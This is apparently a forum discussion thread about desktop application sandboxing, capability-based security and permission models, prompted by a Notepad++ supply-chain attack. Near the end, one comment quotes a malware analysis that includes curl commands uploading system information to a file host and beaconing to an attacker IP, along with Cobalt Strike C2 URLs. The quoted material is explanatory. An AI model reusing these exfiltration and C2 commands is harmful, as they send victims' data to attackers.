There is no reason for a tool to implicitly access my mounted cloud drive directory and browser cookies data.
Linux has this capability, of course. And it seems like MacOS prompts me a lot for "such and such application wants to access this or that". But I think it could be a lot more fine-grained, personally.
Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps. Not because OS vendors want to control what apps do, but because users do. If the FOSS community continues to ignore proper security sandboxing and distribution of end user applications, then it will just end up entirely centralised in one of the big tech companies, as it already is on iOS and macOS by Apple.
iOS and Android both implement these security policies correctly. Why can't desktop operating systems?
There is no such thing as computer security, in general, at this point in history.
Not sure how something can be called a sandbox without the actual box part. As Siri is to AI, Flatpak is to sandboxes.
Indeed. Why lock your car door as anyone can unlock and steal it by learning lock-picking?
I think you mean a lot of flak? Slack would kind of be the opposite.
You can use the underlying sandboxing with bwrap. A good alternative is firejail. They are quite easy to use.
I prefer to centralize package management to my distro, but I value their sandboxing efforts.
Personally, I think it's time to take sandboxing seriously. Supply chain attacks keep happening. Defense is depth is the way.
That subtlety is important because it explains how the backdoors have snuck in — most people feel safe because they are not targeted, so there's no hue and cry.
Think about it from a real world perspective.
I knock on your door. You invite me to sit with you in your living room. I can't easily sneak into your bed room. Further, your temporary access ends as soon as you exit my house.
The same should happen with apps.
When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2. Further, as soon as I exit the process, the permission to access dir1 should end as well.
The most popular desktop OSes have decades of pre-existing software and APIs to support and, like a lot of old software, the debt of choices made a long time ago that are now hard/expensive to put right.
The major desktop OSes are to some degree moving in this direction now (note the ever increasing presence of security prompts when opening "things" on macOS etc etc), but absent a clean sheet approach abandoning all previous third party software like the mobile OSes got, this arguably can't happen easily over night.
For FreeBSD there is capsicum, but it seems a bit inflexible to me. Would love to see more experiments on Linux and the BSDs for this.
We can make operating systems where the islands can interact. Its just needs to be opt in instead of opt out. A bad Notepad++ update shouldn't be able to invisibly read all of thunderbird's stored emails, or add backdoors to projects I'm working on or cryptolocker my documents. At least not without my say so.
I get that permission prompts are annoying. There are some ways to do the UI aspect in a better way - like have the open file dialogue box automatically pass along permissions to the opened file. But these are the minority of cases. Most programs only need to access to their own stuff. Having an OS confirmation for the few applications that need to escape their island would be a much better default. Still allow all the software we use today, but block a great many of these attacks.
naturally even flatpak on Linux suffers from this as legacy software simply doesn’t have a concept of permission models and this cannot be bolted on after the fact
That's what I with my sandbox right now
In such a scenario, you can launch your IDE from your application manager and then only give write access to specific folders for a project. The IDE's configuration files can also be stored in isolated directories. You can still access them with your file manager software or your terminal app which are "special" and need to be approved by you once (or for each update) as special. You may think "How do I even share my secrets like Git SSH keys?". Well that's why we need services like the SSH Agent or Freedesktop secret-storage-spec. Windows already has this btw as the secret vaults. They are there since at least Windows 7 maybe even Vista.
Sound engineers don't use lossy formats such as MP3 when making edits in preproduction work, as its intended for end users and would degrade quality cumulatively. In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
It would be unfortunate to see the nuance missed just because a system isn't 'new', it doesn't mean the system needs to be scrapped.
A slightly more advanced model, which is the default for OSes today, is to have a notion of a "user", and then you grant certain permissions to a user. For example, for something like Unix, you have the read/write/execute permissions on files that differ for each user. The security mentioned above just involves defining more such permissions than were historically provided by Unix.
But the holy grail of security models is called "capability-based security", which is above and beyond what any current popular OS provides. Rather than the current model which just involves talking about what a process can do (the verbs of the system), a capability involves taking about what a process can do an operation on (the nouns of the system). A "capability" is an unforgeable cryptographic token, managed by the OS itself (sort of like how a typical OS tracks file handles), which grants access to a certain object.
Crucially, this then allows processes to delegate tasks to other processes in a secure way. Because tokens are cryptographically unforgeable, the only way that a process could have possibly gotten the permission to operate on a resource is if it were delegated that permission by some other process. And when delegating, processes can further lock down a capability, e.g. by turning it from read/write to read-only, or they can e.g. completely give up a capability and pass ownership to the other process, etc.
So when it's all said and done, I do not expect practical levels of actual isolation to be that great.
Are they wrong? Do gradations of vulnerability exist? Is there only one threat model, “you’re already screwed and nothing matters”?
I had been thinking of a way to avoid the CloudABI launcher. The entitlements would instead be in the binary object file, and only reference command-line parameters and system paths. I have also thought of an elaborate scheme with local code signing to verify that only user/admin-approved entitlements get lifted to capabilities.
However, CloudABI got discontinued in favour of WebAssembly (and I got side-tracked...)
Redox is also moving towards having capabilities mapped to fd's, somewhat like Capsicum. Their recent presentation at FOSDEM: https://fosdem.org/2026/schedule/event/KSK9RB-capability-bas...
The data doesn't support the suggestion that this is happening on any mass scale. When Apple made app tracking opt-in rather than opt-out in iOS 14 ("App Tracking Transparency"), 80-90% of users refused to give consent.
It does happen more when users are tricked (dare I say unlawfully defrauded?) into accepting, such as when installing Windows, when launching Edge for the first time, etc. This is why externally-imposed sandboxing is a superior model to Zuck's pinky promises.
try to run gimp inside a container for example, you’ll have to give access to your ~/Pictures or whatever for it to be useful
Compared to some photo editing applications on android/iOS which can work without having filesystem access by getting the file through the OS file picker
Sure, in theory, SELinux could prevent this. But seems like an uphill battle if my policies conflict with the distro’s. I’d also have to “absorb” their policies’ mental model first…
Asking continuously is worse than not asking at all…
> In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
I'm worried that many software developers (including me, a lot of the time) will only enable security after exhausting all other options. So long as there's a big button labeled "Developer Mode" or "Run as Admin" which turns off all the best security features, I bet lots of software will require that to be enabled in order to work.
Apple has quite impressive frameworks for application sandboxing. Do any apps use them? Do those DAWs that sound engineers use run VST plugins in a sandbox? Or do they just dyld + call? I bet most of the time its the latter. And look at this Notepad++ attack. The attack would have been stopped dead if the update process validated digital signatures. But no, it was too hard so instead they got their users' computers hacked.
I'm a pragmatist. I want a useful, secure computing environment. Show me how to do that without annoying developers and I'm all in. But I worry that the only way a proper capability model would be used would be by going all in.
What happens if the user presses ^O, expecting a file open dialog that could navigate to other directories? Would the dialog be somehow integrated to the OS and run with higher permissions, and then notepad is given permissions to the other directory that the user selects?
Or the easier way with an external tool is using Sandboxie: https://sandboxie-plus.com/
But fine lock windows down for normal users as long as I can still disable all the security. We don't need another Apple.
It's still worth solving one of these problems.
Because security people often does not know the balance between security and usability, and we end up with software that is crippled and annoying to use.
Linux people are NOT resistant to this. Atomic desktops are picking up momentum and people are screaming for it. Snaps, flatpaks, appimages, etc. are all moving in that direction.
As for plain development, sadly, the OS developers are simply ignoring the people asking. See:
https://github.com/containers/toolbox/issues/183
https://github.com/containers/toolbox/issues/348
https://github.com/containers/toolbox/issues/1470
I'll leave it up to you to speculate why.
Perhaps getting a bit of black eye and some negative attention from the Great Orange Website(tm) can light a fire under some folks.
There’s also a similar photos picker (PHPicker) which is especially good from 2023 on. Signal uses this for instance.
When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:
3 Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;
4 Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202
-- The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
-- The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/adminMy experience with android apps seems to be different. Every other app seems to be asking for contacts or calling or access to files.
But when the choice is between using the app with such spyware in it, or not using it at all, people do accept the outrageous permissions the spyware needs.
- You invite someone to sit in your living room
- There must have been a reason to begin with (or why invite them at all)
- Implied (at least limited) trust of whoever was invited
- Access enabled and information gained heavily depends on house design
- May have to walk past many rooms to finally reach the living room
- Significant chances to look at everything in your house
- Already allows skilled appraiser to evaluate your theft worthiness
- Many techniques may allow further access to your house
- Similar to digital version (leave something behind)
- Small digital object accessing home network
- "Sorry, I left something, mind if I search around?"
- Longer con (advance to next stage of "friendship" / "relationship", implied trust)
- "We should hang out again / have a cards night / go drinking together / ect..."
- Flattery "Such a beautiful house, I like / am a fan of <madlibs>, could you show it to me?"
- Already provides a survey of your home security
- Do you lock your doors / windows?
- What kind / brand / style do you have?
- Do you tend to just leave stuff open?
- Do you have onsite cameras or other features?
- Do you easily just let anybody into your house who asks?
- General cleanliness and attention to security issues
- In the case of Notepad++, they would also be offering you a free product
- Significant utility vs alternatives
- Free
- Highly recommended by many other "neighbors"
- In the case of Notepad++, they themselves are not actively malicious (or at least not known to be)
- Single developer
- Apparently frazzled and overworked by the experience
- Makes updates they can, yet also support a free product for millions.
- It doesn't really work with the friend you invite in scenario (more like they sneezed in your living room or something)Basically a thing that I could assign 1) apps and 2) content to. Apps can access all content in all circles they are assigned to. Circles can overlap arbitrarily so you can do things like having apps A,B,C share access to documents X,Y but only A,B have access to Z etc.